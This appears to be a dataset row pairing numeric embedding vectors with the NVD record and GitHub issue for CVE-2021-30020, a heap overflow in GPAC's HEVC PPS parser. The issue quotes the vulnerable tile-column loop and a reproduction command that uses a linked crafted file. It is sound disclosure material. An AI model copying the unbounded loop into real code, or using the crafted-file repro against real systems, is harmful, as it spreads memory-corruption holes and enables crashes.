0.0030757186468690634, 0.00751925352960825, 0.003456913400441408, -0.026967661455273628, -0.009298162534832954, 0.007982666604220867, -0.028088822960853577, 0.0051012830808758736, -0.01902984082698822, 0.03249872103333473, -0.010120347142219543, 0.007885499857366085, 0.007070789113640785, -0.014268643222749233, 0.01554676704108715, 0.010135295800864697, 0.015501920133829117, -0.016428746283054352, -0.02080874890089035, -0.01977728120982647, -0.009641985408961773, 0.004559388384222984, -0.019747383892536163, 0.015322534367442131, 0.0021339431405067444, 0.002737501636147499, 0.0019031709525734186, -0.0248150322586298, 0.005082597024738789, 0.016996802762150764, 0.03456166014075279, -0.006674645468592644, 0.001653712592087686, -0.018551478162407875, 0.010740723460912704, -0.0010314681567251682, -0.0043650539591908455, -0.009970858693122864, -0.003344797296449542, -0.0009716729400679469, 0.000670360866934061, -0.016563287004828453, 0.01710144430398941, 0.003307425184175372, -0.007504304870963097, -0.012542054988443851, -0.00877495389431715, -0.01284103188663721, 0.004021231085062027, 0.008446079678833485, -0.0048695760779082775, 0.002623516833409667, -0.002371255774050951, 0.0016051289858296514, 0.011824511922895908, 0.016712773591279984, -0.03444206714630127, 0.011189187876880169, -0.004353842232376337, -0.003879217430949211, 0.024635646492242813, 0.008311540819704533, -0.012078641913831234, -0.01577099971473217, -0.02030049078166485, -0.007900448516011238, 0.010456695221364498, -0.024531004950404167, 0.005164815578609705, -0.002920624567195773, -0.013521202839910984, 0.007848127745091915, 0.0068316082470119, -0.008520823903381824, -0.021152572706341743, 0.0004736905684694648, -0.008984236977994442, -0.01659318432211876, 0.018611274659633636, -0.0004047858528792858, -0.012041269801557064, -0.01704164780676365, -0.0020479876548051834, -0.006685857195407152, 0.01858137547969818, 0.008453554473817348, 0.00825922004878521, 0.011420894414186478, -0.002531955484300852, 0.006308399606496096, 0.008348912931978703, 0.002330146497115493, -0.0023955474607646465, 0.013558574952185154, -0.006637273356318474, -0.025562472641468048, -0.000013131307241565082, -0.013483830727636814, 0.007018468342721462, 0.004488381557166576, 0.03420288860797882, 0.0040810261853039265, 0.013371714390814304, -0.016682876273989677, -0.016354002058506012, 0.007810755632817745, 0.008281643502414227, -0.011323726736009121, -0.02406759187579155, -0.009641985408961773, -0.002584276255220175, -0.0015742969699203968, -0.03545858711004257, 0.012601850554347038, 0.00892444234341383, -0.005744081921875477, 0.0057964026927948, -0.022049501538276672, 0.008363861590623856, -0.01377533283084631, 0.002918756101280451, -0.01711639203131199, -0.03850814700126648, -0.006525157485157251, -0.008647888898849487, 0.035428691655397415, -0.02207939885556698, -0.011951576918363571, 0.019792230799794197, -0.003066375618800521, 0.0059982119128108025, -0.00590851902961731, 0.000494245148729533, 0.0014276118017733097, -0.006704543251544237, 0.005975788459181786, 0.00944017618894577, -0.011974000371992588, 0.01214591134339571, 0.004252937622368336, 0.0007142730173654854, -0.003871742868795991, 0.004989166744053364, -0.005848723463714123, 0.019239123910665512, 0.01732567511498928, -0.0018022664589807391, -0.0188056081533432, -0.01925407350063324, -0.012347720563411713, -0.011929153464734554, 0.0004743912722915411, -0.011144340969622135, -0.018700966611504555, -0.0064877853728830814, 0.006342034321278334, 0.04374023154377937, -0.008864646777510643, -0.00046154463780112565, 0.008042462170124054, -0.02015100233256817, -0.0008922573761083186, -0.012377617880702019, 0.01953810080885887, -0.004275361075997353, 0.009485023096203804, 0.000021357534933486022, 0.0055235871113836765, -0.00810225773602724, -0.005407733377069235, 0.0060841673985123634, 0.0103371050208807, -0.01225802768021822, -0.011525535956025124, 0.008782428689301014, 0.022408273071050644, 0.006345771718770266, 0.01865611970424652, 0.011204136535525322, -0.007676216308027506, -0.002406759187579155, 0.00806488562375307, -0.007863076403737068, -0.007250174880027771, 0.014164001680910587, 0.01680246740579605, 0.01711639203131199, 0.004522016271948814, 0.020868545398116112, 0.0014640494482591748, -0.01687721163034439, 0.014814275316894054, -0.017295777797698975, -0.0045369649305939674, -0.008348912931978703, 0.00016268514445982873, 0.009701780043542385, 0.005202187225222588, 0.005026538856327534, -0.0014733924763277173, -0.0002599692379590124, 0.02273714728653431, 0.01143584307283163, 0.025293393060564995, -0.008319015614688396, -0.017714345827698708, -0.016862262040376663, -0.0007852799026295543, 0.006954935844987631, -0.025203701108694077, -0.015247791074216366, 0.014246219769120216, -0.01946335658431053, -0.005807614419609308, 0.002296511549502611, 0.009006660431623459, -0.004077289253473282, -0.01426116842776537, 0.018476733937859535, 0.005542272701859474, -0.02088349312543869, 0.0011884307023137808, -0.020778851583600044, -0.0010426797671243548, -0.009851268492639065, 0.012571953237056732, -0.02494957111775875, -0.005762767978012562, -0.009126251563429832, -0.006420515943318605, -0.004716350696980953, -0.007134321611374617, -0.017445266246795654, 0.007885499857366085, 0.005837512202560902, -0.0007451049750670791, 0.008012564852833748, 0.011794614605605602, 0.0060131605714559555, -0.009604613296687603, -0.01292324997484684, -0.013835127465426922, -0.01095748133957386, 0.016249360516667366, 0.03315646946430206, -0.009911064058542252, -0.03764111548662186, -0.006528894882649183, -0.017221033573150635, 0.02013605274260044, -0.006790498737245798, 0.0016098004998639226, -0.007403400260955095, -0.028387797996401787, -0.012362669222056866, 0.0023488325532525778, 0.005489951930940151, 0.025891346856951714, 0.015681305900216103, 0.011047174222767353, 0.004686453379690647, 0.007616420742124319, 0.02577175572514534, 0.0051872385665774345, -0.010725773870944977, 0.02088349312543869, -0.004237988963723183, 0.006760601419955492, -0.019209226593375206, -0.016981853172183037, -0.004193142522126436, -0.005078859627246857, 0.0017480769893154502, -0.0003426548501010984, 0.019388612359762192, 0.018117962405085564, 0.014276118017733097, -0.016832364723086357, -0.00025716633535921574, 0.007982666604220867, -0.011712395586073399, 0.006001948844641447, 0.013154956512153149, 0.00037839185097254813, -0.024396464228630066, -0.015666358172893524, -0.023140763863921165, 0.016712773591279984, 0.021720627322793007, -0.023125816136598587, -0.017968473955988884, 0.036176130175590515, 0.003438227344304323, 0.010860313661396503, 0.01363331824541092, -0.0012192627182230353, 0.026190321892499924, 0.021062878891825676, -0.01627925969660282, -0.003469993593171239, -0.005228347610682249, 0.0020629363134503365, -0.002937441924586892, -0.008745056577026844, -0.02361912652850151, -0.02406759187579155, -0.008020038716495037, 0.004107186570763588, 0.01225802768021822, -0.02155619114637375, 0.02052472159266472, -0.004308995790779591, 0.010912634432315826, -0.0009268264984712005, 0.03318636864423752, 0.004619183484464884, 0.014642363414168358, 0.021197419613599777, -0.0031635428313165903, 0.005665600765496492, 0.01103969942778349, 0.0051909759640693665, -0.007855601608753204, -0.007676216308027506, 0.007111898623406887, -0.009455124847590923, 0.005374098662286997, 0.011876832693815231, -0.015606562606990337, -0.014193898998200893, 0.021152572706341743, 0.006312137003988028, -0.024336669594049454, 0.0004624789289664477, -0.007631369866430759, -0.004155770409852266, -0.011346150189638138, 0.005740344524383545, 0.012130962684750557, -0.007803281303495169, -0.03228943794965744, -0.012721440754830837, -0.031362611800432205, 0.011450791731476784, 0.007721062749624252, -0.020240694284439087, -0.03205025941133499, 0.013506254181265831, -0.0024161022156476974, 0.016428746283054352, 0.0036194815766066313, 0.012826082296669483, -0.0024366567377001047, -0.02044997736811638, -0.010008230805397034, -0.0031616741325706244, -0.014836697839200497, 0.0032345496583729982, 0.013371714390814304, -0.012557003647089005, 0.00021734174515586346, 0.027206841856241226, -0.0008011630270630121, -0.0005577776464633644, -0.003488679649308324, -0.007530465256422758, -0.009223418310284615, -0.01747516356408596, -0.002059199148789048, 0.015053455717861652, 0.0150385070592165, 0.007750960066914558, -0.011831986717879772, 0.02651919610798359, -0.016114821657538414, -0.019956666976213455, 0.01292324997484684, -0.015173046849668026, 0.012190758250653744, -0.013820178806781769, -0.014126629568636417, 0.007975192740559578, 0.011495638638734818, 0.021660832688212395, 0.007100686896592379, -0.013506254181265831, 0.004690190311521292, 0.012766287662088871, 0.019717486575245857, 0.0017555514350533485, 0.004581811372190714, -0.0071380590088665485, 0.024261925369501114, -0.0034998911432921886, 0.004495855886489153, 0.00870020966976881, 0.016099873930215836, 0.0014649837976321578, 0.015322534367442131, -0.015247791074216366, 0.009806422516703606, 0.012803659774363041, 0.007059577386826277, 0.01805816777050495, -0.017759190872311592, -0.009567241184413433, 0.016548337414860725, 0.014604991301894188, -0.0009772786870598793, 0.0026552830822765827, -0.01569625549018383, -0.02436656691133976, -0.010314681567251682, -0.0149189168587327, -0.01910458505153656, 0.00840870849788189, -0.011652600951492786, 0.0023787301033735275, -0.004335156176239252, 0.023454690352082253, 0.022198989987373352, 0.010778095573186874, -0.007220277097076178, -0.0037577582988888025, 0.007620158139616251, -0.00929068773984909, 0.0017527485033497214, -0.0028066399972885847, 0.021122675389051437, 0.024560902267694473, -0.008020038716495037, -0.014186425134539604, -0.003473730757832527, -0.005512375384569168, -0.006173860281705856, 0.014186425134539604, -0.028238309547305107, 0.00958966463804245, 0.00359332119114697, -0.009096353314816952, 0.0048882621340453625, 0.024560902267694473, -0.02050977386534214, 0.005658126436173916, -0.007508041802793741, 0.00881232600659132, -0.010000756941735744, -0.027117149904370308, 0.0012444887543097138, 0.004462221171706915, -0.013341817073523998, 0.005930942017585039, 0.029060494154691696, -0.019209226593375206, -0.003520445665344596, 0.022901583462953568, 0.005990737117826939, -0.00877495389431715, -0.017968473955988884, -0.014470452442765236, -0.004170719068497419, -0.013259598053991795, 0.03172138333320618, -0.006555055268108845, -0.011981474235653877, 0.003322374075651169, 0.008670312352478504, 0.024829979985952377, -0.008319015614688396, -0.012317823246121407, -0.01932881772518158, 0.0057964026927948, -0.004806043580174446, 0.02378356270492077, -0.004215565510094166, 0.0162942074239254, -0.007111898623406887, -0.011263931170105934, 0.014672261662781239, -0.01835714466869831, -0.001818149583414197, -0.009021609090268612, 0.012003897689282894, -0.008588094264268875, -0.0034587818663567305, 0.0010688402689993382, -0.015412227250635624, -0.019508203491568565, 0.022647453472018242, 0.018013320863246918, 0.00881232600659132, -0.006599901709705591, 0.003027134807780385, 0.009455124847590923, 0.008319015614688396, -0.03222964331507683, 0.015045981854200363, 0.002567458897829056, -0.008505875244736671, -0.00187047035433352, 0.0103371050208807, -0.013543625362217426, -0.00544136855751276, 0.008752530440688133, 0.017669498920440674, 0.002333883661776781, 0.011136867105960846, -0.00575903058052063, 0.00799761526286602, 0.018013320863246918, 0.019523151218891144, 0.0033859063405543566, -0.0044510094448924065, -0.0013790280790999532, 0.002240453613922, -0.047058869153261185, -0.01813291199505329, -0.012272976338863373, 0.010523965582251549, 0.006009423173964024, 0.0007703310693614185, 0.023649023845791817, -0.01284103188663721, -0.016099873930215836, 0.02311086654663086, -0.014096732251346111, 0.009141200222074986, -0.013424035161733627, 0.0012613062281161547, -0.013424035161733627, -0.016189565882086754, -0.011869358830153942, -0.011503112502396107, 0.005882358644157648, 0.0009431767393834889, 0.016697825863957405, 0.011166764423251152, 0.03088425099849701, 0.03770091012120247, -0.01092758309096098, -0.002089096698909998, 0.036325618624687195, 0.03249872103333473, -0.006797973532229662, -0.0023581753484904766, -0.021735576912760735, 0.011271405965089798, -0.0044136373326182365, 0.0333358570933342, -0.012168334797024727, 0.02103298157453537, 0.015576664358377457, -0.006745652295649052, -0.018970046192407608, 0.0037969988770782948, -0.016787517815828323, 0.007063314784318209, 0.005549747496843338, 0.022767044603824615, 0.0026347285602241755, 0.010038129054009914, -0.00451827934011817, 0.008580619469285011, -0.0035372632555663586, 0.0005105954478494823, -0.012168334797024727, -0.01163017749786377, -0.020928340032696724, 0.0162942074239254, 0.020569568499922752, -0.019657690078020096, 0.021272161975502968, 0.023051071912050247, -0.018237553536891937, -0.007317444775253534, 0.005086333956569433, -0.006506471429020166, 0.003688619937747717, -0.027744999155402184, 0.006697068922221661, 0.0010950006544589996, 0.021720627322793007, 0.006992307957261801, -0.01100232731550932, 0.007885499857366085, -0.0021918700076639652, -0.018416939303278923, 0.01507587917149067, -0.004181930795311928, 0.021660832688212395, -0.012512157671153545, -0.004731299821287394, -0.026773326098918915, 0.010994852520525455, -0.0064504132606089115, 0.0017929234309121966, -0.01562151126563549, -0.006738177966326475, -0.006252341438084841, 0.0057366075925529, -0.02657899260520935, -0.008909493684768677, -0.008573144674301147, 0.00334105989895761, -0.032977085560560226, -0.0072427005507051945, 0.011712395586073399, 0.012018846347928047, 0.01421632245182991, -0.008610516786575317, 0.004731299821287394, 0.004757460206747055, -0.0038343709893524647, 0.001816280884668231, -0.000807235948741436, 0.0038343709893524647, -0.011988949030637741, 0.0013313788222149014, 0.001304284087382257, -0.012975570745766163, 0.00822184793651104, -0.013424035161733627, 0.014021988026797771, 0.007067052181810141, 0.00612901384010911, 0.02393305115401745, 0.011196661740541458, 0.029942475259304047, 0.012392567470669746, -0.019762331619858742, 0.027057353407144547, -0.0030551638919860125, 0.022677350789308548, 0.011032224632799625, -0.016174616292119026, -0.00017249530355911702, -0.00825922004878521, 0.005949628073722124, 0.018910249695181847, -0.008281643502414227, 0.016907108947634697, 0.007339867763221264, -0.005844986531883478, 0.026265066117048264, 0.0014649837976321578, -0.010082975029945374, 0.024411413818597794, 0.0005568433552980423, 0.009783999063074589, -0.005415208172053099, -0.002664626110345125, 0.000725484627764672, -0.007082000840455294, 0.009133725427091122, -0.002601093612611294, -0.008244271390140057, -0.01612977124750614, -0.0009347680606879294, 0.0017854489851742983, 0.017161238938570023, -0.022901583462953568, -0.0028178514912724495, 0.028313053771853447, -0.015060930512845516, 0.02140670269727707, 0.007410874590277672, 0.023663973435759544, -0.01717618852853775, 0.0040287054143846035, 0.0033840378746390343, -0.01902984082698822, 0.006543843541294336, -0.008475977927446365, 0.010479118674993515, 0.0016126033151522279, -0.010628607124090195, -0.012631747871637344, 0.01433591265231371, -0.01681741699576378, 0.0035148400347679853, -0.0136632164940238, -0.03453176096081734, -0.014193898998200893, -0.0035129713360220194, -0.012818608433008194, -0.012684068642556667, 0.012489734217524529, 0.002681443467736244, -0.0006465362384915352, 0.007478144485503435, -0.008558196015655994, -0.0010389426024630666, 0.023529434576630592, 0.007638844195753336, -0.021496394649147987, 0.0033840378746390343, 0.002346963854506612, 0.00205546198412776, 0.05384562909603119, -0.005646914709359407, 0.018835505470633507, 0.008946865797042847, -0.018940147012472153, -0.003492416813969612, -0.009544817730784416, -0.0033541403245180845, 0.009387855418026447, -0.015800897032022476, -0.012781236320734024, -0.021361855790019035, 0.0052208732813596725, -0.00958966463804245, -0.01213843747973442, -0.006136488169431686, 0.010994852520525455, -0.006050532683730125, -0.012056218460202217, -0.015442125499248505, 0.013162431307137012, 0.0004122602695133537, 0.001796660595573485, 0.014193898998200893, 0.003686751239001751, 0.007377239875495434, -0.0064317272044718266, -0.016608132049441338, -0.01612977124750614, -0.022228887304663658, 0.02161598578095436, -0.010523965582251549, 0.0011258325539529324, -0.0027113412506878376, 0.009462599642574787, -0.004678979050368071, 0.007549151312559843, 0.014074308797717094, -0.017146289348602295, 0.0038063419051468372, -0.015337483957409859, -0.013984615914523602, 0.013521202839910984, 0.013356765732169151, -0.015337483957409859, 0.006898877676576376, -0.008640415035188198, 0.016249360516667366, 0.013752909377217293, 0.03013680875301361, -0.01029973290860653, 0.0076276324689388275, 0.003324242541566491, 0.0235593318939209, -0.018476733937859535, -0.0006301859393715858, 0.007074526511132717, -0.009798947721719742, -0.006267290562391281, 0.01636895164847374, 0.0044659581035375595, 0.01244488824158907, -0.01852158084511757, 0.00803498737514019, -0.002317066304385662, -0.0007236160454340279, 0.008348912931978703, 0.01650349050760269, 0.003841845318675041, 0.03518950939178467, -0.009215944446623325, -0.012938198633491993, -0.014941340312361717, -0.021870115771889687, 0.009940961375832558, -0.031960565596818924, -0.0019881923217326403, -0.011308778077363968, 0.005613279994577169, 0.009970858693122864, -0.006943724118173122, -0.007067052181810141, 0.007048366125673056, 0.009073929861187935, -0.01244488824158907, 0.001668661367148161, -0.005202187225222588, -0.004705139435827732, 0.005011590197682381, -0.0003190637507941574, -0.0038829545956104994, 0.020195847377181053, 0.0026328598614782095, -0.0004052530275657773, 0.01225802768021822, 0.0013369845692068338, 0.0067344410344958305, 0.010045602917671204, 0.008423657156527042, 0.01088273711502552, 0.01680246740579605, 0.009970858693122864, -0.03094404563307762, 0.01955304853618145, -0.0059982119128108025, -0.026788275688886642, 0.0019937981851398945, -0.0166679285466671, -0.012377617880702019, -0.00612901384010911, 0.020420080050826073, 0.009933487512171268, -0.025652164593338966, -0.014500349760055542, 0.004877050872892141, -0.002791691105812788, -0.03264820948243141, -0.005045224912464619, 0.03515961021184921, 0.0008931916672736406, -0.007848127745091915, 0.010060551576316357, -0.005116231739521027, -0.018162809312343597, -0.00418566819280386, 0.000003697057763929479, 0.004548176657408476, 0.01437328476458788, 0.023962948471307755, -0.004963006358593702, 0.007380977272987366, -0.00003967859083786607, 0.019597895443439484, 0.00035923870746046305, 0.028851211071014404, -0.010389425791800022, -0.0004909751005470753, 0.015270213596522808, 0.0010884605580940843, 0.016398848965764046, 0.005261982791125774, 0.022767044603824615, -0.005867409519851208, -0.009126251563429832, -0.0022647453006356955, -0.001763025764375925, -0.020420080050826073, -0.017221033573150635, -0.007907922379672527, -0.014537721872329712, 0.0102175148203969, 0.004095975309610367, 0.018117962405085564, -0.009769050404429436, 0.0036213502753525972, 0.006121539510786533, 0.010523965582251549, 0.03142240643501282, -0.017131341621279716, -0.006368194706737995, 0.0043650539591908455, 0.007635106798261404, 0.010740723460912704, -0.03240903094410896, -0.003212126437574625, -0.0010753803653642535, 0.009044032543897629, -0.014761954545974731, 0.012280451133847237, 0.0027094725519418716, -0.003653116524219513, -0.017310727387666702, -0.01377533283084631, -0.007489355746656656, 0.01299799419939518, 0.024620696902275085, 0.009499971754848957, 0.0034980224445462227, -0.007930345833301544, 0.00716421939432621, 0.00649899709969759, 0.015120726078748703, -0.03303688019514084, 0.005142392124980688, 0.004757460206747055, -0.004596760496497154, 0.001155730220489204, -0.00825922004878521, 0.029209982603788376, 0.021571138873696327, -0.00440616300329566, 0.002546904142946005, 0.008319015614688396, 0.010120347142219543, -0.011368573643267155, 0.022841788828372955, -0.02361912652850151, 0.00011696279398165643, 0.024172233417630196, 0.004099712241441011, 0.0032214694656431675, -0.014941340312361717, 0.023499535396695137, -0.0023376208264380693 ]
2,294
CVE-2021-30020
2021-04-19T20:15:14.550000
In the function gf_hevc_read_pps_bs_internal function in media_tools/av_parsers.c in GPAC 1.0.1 there is a loop, which with crafted file, pps->num_tile_columns may be larger than sizeof(pps->column_width), which results in a heap overflow in the loop.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1722" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1722
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
In `media_tools/av_parsers.c`, function `gf_hevc_read_pps_bs_internal`. There is a loop as below: ` pps->num_tile_columns = 1 + gf_bs_read_ue_log(bs, "num_tile_columns_minus1"); pps->num_tile_rows = 1 + gf_bs_read_ue_log(bs, "num_tile_rows_minus1"); pps->uniform_spacing_flag = gf_bs_read_int_log(bs, 1, "uniform_spacing_flag"); if (!pps->uniform_spacing_flag) { for (i = 0; i < pps->num_tile_columns - 1; i++) { pps->column_width[i] = 1 + gf_bs_read_ue_log_idx(bs, "column_width_minus1", i); } ` However, with crafted file, **pps->num_tile_columns** may be larger than sizeof(pps->column_width), which results a heap overflow in the loop. In Command line: gpac -info bug5 ![bug5_cmd](https://user-images.githubusercontent.com/44844446/112795077-9428d780-909a-11eb-876e-98e1703150b2.png) In gdb: ![bug5](https://user-images.githubusercontent.com/44844446/112803057-790f9500-90a5-11eb-8d68-f5f040fd8115.png) The crafted file is in the attached zip: [bug5.zip](https://github.com/gpac/gpac/files/6219707/bug5.zip)
A heap overflow in function gf_hevc_read_pps_bs_internal
https://api.github.com/repos/gpac/gpac/issues/1722/comments
1
2021-03-29T06:29:39
2021-03-29T07:47:09Z
https://github.com/gpac/gpac/issues/1722
843,020,967
1,722
true
This is a GitHub Issue repo:gpac owner:gpac Title : A heap overflow in function gf_hevc_read_pps_bs_internal Issue date: --- start body --- In `media_tools/av_parsers.c`, function `gf_hevc_read_pps_bs_internal`. There is a loop as below: ` pps->num_tile_columns = 1 + gf_bs_read_ue_log(bs, "num_tile_columns_minus1"); pps->num_tile_rows = 1 + gf_bs_read_ue_log(bs, "num_tile_rows_minus1"); pps->uniform_spacing_flag = gf_bs_read_int_log(bs, 1, "uniform_spacing_flag"); if (!pps->uniform_spacing_flag) { for (i = 0; i < pps->num_tile_columns - 1; i++) { pps->column_width[i] = 1 + gf_bs_read_ue_log_idx(bs, "column_width_minus1", i); } ` However, with crafted file, **pps->num_tile_columns** may be larger than sizeof(pps->column_width), which results a heap overflow in the loop. In Command line: gpac -info bug5 ![bug5_cmd](https://user-images.githubusercontent.com/44844446/112795077-9428d780-909a-11eb-876e-98e1703150b2.png) In gdb: ![bug5](https://user-images.githubusercontent.com/44844446/112803057-790f9500-90a5-11eb-8d68-f5f040fd8115.png) The crafted file is in the attached zip: [bug5.zip](https://github.com/gpac/gpac/files/6219707/bug5.zip) --- end body ---
1,222
[ -0.04829397797584534, 0.043458499014377594, -0.01204308308660984, 0.013867792673408985, 0.048689331859350204, 0.02083210088312626, -0.004508553072810173, 0.043397676199674606, -0.014080675318837166, 0.013282365165650845, -0.01567729562520981, -0.013510453514754772, 0.034912776201963425, -0.0008187433704733849, 0.0019168953876942396, 0.002275184728205204, -0.008492502383887768, 0.007587750442326069, -0.0013466737000271678, -0.0010359027655795217, 0.037072014063596725, -0.04281985014677048, -0.024694403633475304, 0.03661583736538887, -0.011465257965028286, 0.0036152058746665716, -0.0018864836310967803, 0.012073494493961334, 0.016726505011320114, 0.012362407520413399, 0.009108342230319977, 0.03819725289940834, 0.018900949507951736, 0.029028087854385376, 0.05200422182679176, 0.005713621620088816, 0.04817233234643936, 0.08247686922550201, -0.0026458287611603737, -0.01827750727534294, -0.003999155014753342, -0.0314154177904129, -0.023371487855911255, 0.013677719049155712, 0.016711298376321793, 0.0006980464677326381, 0.022976133972406387, -0.006743822246789932, -0.03293600678443909, -0.016711298376321793, 0.029408235102891922, -0.008325237780809402, -0.026838436722755432, -0.024846462532877922, -0.030533473938703537, -0.020877718925476074, 0.027522701770067215, 0.029590707272291183, -0.016908975318074226, 0.04829397797584534, -0.04233326017856598, -0.020786482840776443, -0.033088065683841705, 0.028450263664126396, -0.007504118140786886, -0.02633664198219776, -0.022291868925094604, 0.029271382838487625, 0.01595100201666355, 0.03296642005443573, -0.012316789478063583, -0.05331193283200264, 0.02607814036309719, 0.03570348396897316, 0.028617529198527336, -0.032023653388023376, 0.05087898671627045, 0.010993875563144684, -0.006937697995454073, 0.02207898534834385, -0.06064118072390556, 0.016832945868372917, -0.03862302005290985, 0.018155859783291817, 0.011647729203104973, 0.008591340854763985, -0.025971699506044388, -0.07317085564136505, -0.0355210117995739, -0.01884012669324875, 0.004090390633791685, 0.03296642005443573, 0.013586482964456081, -0.0015310454182326794, 0.0008030622848309577, 0.03445659950375557, -0.014399999752640724, -0.009564518928527832, -0.031841181218624115, -0.012240760028362274, -0.054437167942523956, -0.017045827582478523, 0.0026591341011226177, 0.007576345931738615, -0.000761721224989742, 0.0017486800206825137, -0.005470327101647854, -0.01634635590016842, 0.004694825503975153, 0.09567560255527496, 0.008484899066388607, -0.0034156281035393476, -0.010210770182311535, 0.023432312533259392, 0.008439281955361366, 0.029834000393748283, -0.01403505727648735, -0.01370052807033062, -0.012666525319218636, -0.008941076695919037, 0.00226378021761775, -0.034821540117263794, -0.019570009782910347, 0.011814994737505913, -0.03205406293272972, 0.060732416808605194, -0.015905385836958885, -0.015662090852856636, -0.04202914237976074, -0.03494318947196007, -0.03460865840315819, -0.034426186233758926, 0.006534741260111332, -0.04044772684574127, 0.013259556144475937, -0.004174022935330868, 0.006553748622536659, 0.026762407273054123, 0.015753325074911118, 0.01934192143380642, -0.04677338898181915, -0.027218583971261978, 0.05395057797431946, -0.012111510150134563, 0.0011651531094685197, -0.015228722244501114, 0.003044984070584178, 0.016985004767775536, -0.0475032739341259, 0.026595141738653183, 0.009070327505469322, -0.01935712806880474, 0.01191383320838213, -0.01070496253669262, 0.0310656800866127, 0.0025393874384462833, 0.018125448375940323, 0.04020443558692932, -0.01999577507376671, -0.003957338631153107, -0.01744118146598339, -0.040295667946338654, 0.01677212119102478, 0.0053220693953335285, -0.034000422805547714, -0.023979725316166878, 0.008614149875938892, 0.024603167548775673, -0.005314466543495655, 0.019448362290859222, 0.007340654730796814, -0.03156747668981552, 0.024937696754932404, 0.04336726292967796, -0.040478140115737915, -0.01902259700000286, 0.027765996754169464, 0.05504540354013443, -0.0355210117995739, 0.00045213830890133977, -0.01900739036500454, -0.0034441393800079823, 0.006652587093412876, -0.0043184794485569, 0.017456388100981712, -0.0071657863445580006, 0.022550368681550026, -0.020938541740179062, 0.02540908008813858, -0.024724815040826797, 0.019630834460258484, -0.003366209100931883, -0.00002616486199258361, -0.011358817107975483, 0.03079197369515896, -0.03427412733435631, -0.018748890608549118, -0.027796408161520958, 0.0021972544491291046, 0.008378458209335804, 0.02507455088198185, -0.015920590609312057, -0.0398394912481308, 0.007629566825926304, -0.02832861617207527, 0.0388663150370121, 0.008522913791239262, 0.04361055791378021, 0.0038071805611252785, -0.017638858407735825, -0.05200422182679176, -0.03561224788427353, 0.025682786479592323, 0.007063146680593491, -0.037558604031801224, 0.0027674762532114983, -0.017045827582478523, -0.0005659450544044375, -0.014711720868945122, 0.004303273279219866, 0.02075607143342495, -0.010020696558058262, 0.025393875315785408, -0.03330095112323761, -0.02665596641600132, 0.0010197465308010578, -0.008705385029315948, 0.007492713630199432, -0.03436536341905594, 0.029286587610840797, 0.03421330451965332, -0.026762407273054123, 0.00030435583903454244, 0.0016593452310189605, 0.019326714798808098, -0.01967645063996315, -0.009921858087182045, -0.01108511071652174, -0.0020109820179641247, -0.015487222000956535, -0.0048734950833022594, 0.0357338972389698, -0.029910031706094742, -0.019980570301413536, 0.006120380014181137, 0.07128532230854034, -0.020330306142568588, 0.001055860542692244, -0.0027294612955302, 0.02016304060816765, 0.0038699049036949873, -0.014666102826595306, 0.01456726435571909, -0.0015586060471832752, -0.007462301757186651, 0.012894614599645138, 0.010902639478445053, 0.010355226695537567, -0.02341710589826107, -0.018414361402392387, 0.005702217575162649, -0.006637380924075842, -0.04707750678062439, -0.020482365041971207, 0.01628553308546543, -0.015213515609502792, -0.005017951130867004, -0.012795776128768921, -0.010492079891264439, -0.03737613558769226, 0.0309592392295599, -0.024390283972024918, -0.034426186233758926, -0.04427962005138397, -0.0036475183442234993, 0.0032008446287363768, 0.012712143361568451, -0.014628088101744652, 0.012742554768919945, 0.006295247934758663, -0.005014149937778711, -0.007720802444964647, -0.02248954586684704, 0.052521225064992905, -0.013844983652234077, 0.001924498355947435, 0.03637254238128662, -0.00722280889749527, -0.015015838667750359, 0.0005436114151962101, 0.007021330296993256, 0.021820485591888428, -0.05020992457866669, 0.0033871170599013567, 0.007146778982132673, 0.03421330451965332, -0.009359239600598812, 0.0000200320082512917, -0.007473706267774105, 0.0010130939772352576, -0.03320971503853798, 0.017912564799189568, -0.012605701573193073, -0.004987539257854223, -0.0767594501376152, -0.017456388100981712, -0.05787370353937149, 0.008583737537264824, -0.0022010558750480413, 0.012271171435713768, 0.06952143460512161, -0.0419987328350544, -0.032844770699739456, -0.01249926071614027, -0.043306440114974976, -0.011259978637099266, -0.026686377823352814, -0.0023892291355878115, -0.026275817304849625, -0.0019520591013133526, -0.01012713834643364, 0.004614994395524263, -0.030274972319602966, 0.004911509808152914, 0.024785637855529785, 0.0022428722586482763, -0.023782048374414444, 0.04190749675035477, -0.04802027344703674, 0.00658035883679986, 0.013692924752831459, -0.021318690851330757, -0.009579725563526154, -0.03959619626402855, 0.030579091981053352, -0.04160337895154953, -0.0278268214315176, 0.0021079196594655514, 0.01004350557923317, -0.0028834212571382523, -0.020041393116116524, 0.008401267230510712, 0.006089968141168356, -0.009199577383697033, -0.006051953416317701, -0.007488911971449852, 0.0002398495125817135, -0.012757761403918266, 